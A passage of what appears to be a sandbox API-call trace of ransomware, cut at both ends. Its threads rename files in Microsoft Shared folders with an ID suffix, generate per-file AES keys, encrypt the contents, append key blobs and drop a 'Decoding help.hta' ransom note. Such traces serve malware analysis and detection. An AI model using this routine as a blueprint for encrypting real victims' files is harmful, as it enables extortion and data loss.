Shared\\Filters\\offfiltx.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x86c [0056.151] CreateFileMappingA (hFile=0x86c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x870 [0056.151] CryptAcquireContextA (in: phProv=0x13e1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13e1fcec*=0x34494f0) returned 1 [0059.818] CryptGenKey (in: hProv=0x34494f0, Algid=0x6610, dwFlags=0x1, phKey=0x13e1fce8 | out: phKey=0x13e1fce8*=0x5a5ff0) returned 1 [0059.818] CryptExportKey (in: hKey=0x5a5ff0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13e1fbe4, pdwDataLen=0x13e1fce4 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fce4*=0x2c) returned 1 [0059.818] MapViewOfFile (hFileMappingObject=0x870, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xbf50000 [0059.853] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x100) returned 1 [0059.853] CryptEncrypt (in: hKey=0x5a5ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xbf50000, pdwDataLen=0x13e1fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xbf50000*, pdwDataLen=0x13e1fce4*=0x100000) returned 1 [0060.125] UnmapViewOfFile (lpBaseAddress=0xbf50000) returned 1 [0061.246] CloseHandle (hObject=0x870) returned 1 [0061.246] CryptDestroyKey (hKey=0x5a5ff0) returned 1 [0061.246] CryptReleaseContext (hProv=0x34494f0, dwFlags=0x0) returned 1 [0061.246] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.246] WriteFile (in: hFile=0x86c, lpBuffer=0x13e1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x13e1fbe4*, lpNumberOfBytesWritten=0x13e1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.972] WriteFile (in: hFile=0x86c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13e1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.972] CloseHandle (hObject=0x86c) returned 1 [0061.972] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.972] FindNextFileW (in: hFindFile=0x5db7b8, lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 Thread: id = 285 os_tid = 0x524 [0042.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*", lpFindFileData=0x13f5fd30 | out: lpFindFileData=0x13f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2f70 [0045.310] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.310] FindNextFileW (in: hFindFile=0x5e2f70, lpFindFileData=0x13f5fd30 | out: lpFindFileData=0x13f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.311] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.311] FindNextFileW (in: hFindFile=0x5e2f70, lpFindFileData=0x13f5fd30 | out: lpFindFileData=0x13f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0045.311] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" [0045.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned 62 [0045.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta" [0045.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\decoding help.hta")) returned 0xffffffff [0045.311] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0045.526] WriteFile (in: hFile=0x488, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13f5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.527] CloseHandle (hObject=0x488) returned 1 [0045.528] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.725] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CGMIMP32.CFG") returned 1 [0048.725] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0048.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" [0048.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned 62 [0048.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpString2="CGMIMP32.CFG" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" [0048.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" [0048.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.[ID]g9uZrLhJaygpwRm1[ID]" [0048.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0051.173] CreateFileMappingA (hFile=0x474, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0051.173] CryptAcquireContextA (in: phProv=0x13f5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13f5fcec*=0x3449e80) returned 1 [0054.732] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x13f5fce8 | out: phKey=0x13f5fce8*=0x5a5f70) returned 1 [0054.732] CryptExportKey (in: hKey=0x5a5f70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13f5fbe4, pdwDataLen=0x13f5fce4 | out: pbData=0x13f5fbe4*, pdwDataLen=0x13f5fce4*=0x2c) returned 1 [0054.732] MapViewOfFile (hFileMappingObject=0x708, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a80) returned 0x2d0000 [0054.754] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13f5fbe4*, pdwDataLen=0x13f5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13f5fbe4*, pdwDataLen=0x13f5fcf8*=0x100) returned 1 [0054.754] CryptEncrypt (in: hKey=0x5a5f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x13f5fce4*=0x1a80, dwBufLen=0x1a80 | out: pbData=0x2d0000*, pdwDataLen=0x13f5fce4*=0x1a80) returned 1 [0054.754] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.756] CloseHandle (hObject=0x708) returned 1 [0054.756] CryptDestroyKey (hKey=0x5a5f70) returned 1 [0054.756] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.756] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.756] WriteFile (in: hFile=0x474, lpBuffer=0x13f5fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x13f5fbe4*, lpNumberOfBytesWritten=0x13f5fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.936] WriteFile (in: hFile=0x474, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13f5fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.936] CloseHandle (hObject=0x474) returned 1 [0056.936] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.469] FindNextFileW (in: hFindFile=0x5e2f70, lpFindFileData=0x13f5fd30 | out: lpFindFileData=0x13f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0058.469] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" [0058.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned 62 [0058.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta" [0058.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\decoding help.hta")) returned 0x1 [0058.469] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CGMIMP32.FLT") returned 1 [0058.469] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0058.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*" [0058.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned 62 [0058.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpString2="CGMIMP32.FLT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" [0058.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" [0058.469] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.[ID]g9uZrLhJaygpwRm1[ID]" [0058.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.613] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0061.613] CreateFileMappingA (hFile=0x380, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdf0 [0061.613] CryptAcquireContextA (phProv=0x13f5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 286 os_tid = 0x770 [0042.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*", lpFindFileData=0x1409fd30 | out: lpFindFileData=0x1409fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5b8 [0042.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.371] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1409fd30 | out: lpFindFileData=0x1409fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.371] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.371] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.371] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1409fd30 | out: lpFindFileData=0x1409fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0042.371] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" [0042.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned 59 [0042.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta" [0042.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\decoding help.hta")) returned 0xffffffff [0042.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d0 [0042.371] WriteFile (in: hFile=0x5d0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1409fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1409fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.372] CloseHandle (hObject=0x5d0) returned 1 [0042.372] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.373] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxds.dll") returned -1 [0042.373] lstrlenW (lpString="hxds.dll") returned 8 [0042.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" [0042.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned 59 [0042.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpString2="hxds.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" [0042.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" [0042.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x608 [0042.426] CreateFileMappingA (hFile=0x608, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x628 [0042.426] CryptAcquireContextA (in: phProv=0x1409fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1409fcec*=0x34487a8) returned 1 [0042.427] CryptGenKey (in: hProv=0x34487a8, Algid=0x6610, dwFlags=0x1, phKey=0x1409fce8 | out: phKey=0x1409fce8*=0x6710b0) returned 1 [0042.427] CryptExportKey (in: hKey=0x6710b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1409fbe4, pdwDataLen=0x1409fce4 | out: pbData=0x1409fbe4*, pdwDataLen=0x1409fce4*=0x2c) returned 1 [0042.427] MapViewOfFile (hFileMappingObject=0x628, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x216d0000 [0044.047] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1409fbe4*, pdwDataLen=0x1409fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1409fbe4*, pdwDataLen=0x1409fcf8*=0x100) returned 1 [0046.359] CryptEncrypt (in: hKey=0x6710b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x216d0000, pdwDataLen=0x1409fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x216d0000*, pdwDataLen=0x1409fce4*=0x100000) returned 1 [0047.359] UnmapViewOfFile (lpBaseAddress=0x216d0000) returned 1 [0047.395] CloseHandle (hObject=0x628) returned 1 [0047.395] CryptDestroyKey (hKey=0x6710b0) returned 1 [0047.395] CryptReleaseContext (hProv=0x34487a8, dwFlags=0x0) returned 1 [0047.395] SetFilePointerEx (in: hFile=0x608, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.395] WriteFile (in: hFile=0x608, lpBuffer=0x1409fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1409fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1409fbe4*, lpNumberOfBytesWritten=0x1409fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.359] WriteFile (in: hFile=0x608, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1409fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1409fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.359] CloseHandle (hObject=0x608) returned 1 [0051.575] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.279] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1409fd30 | out: lpFindFileData=0x1409fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0055.279] lstrcpyW 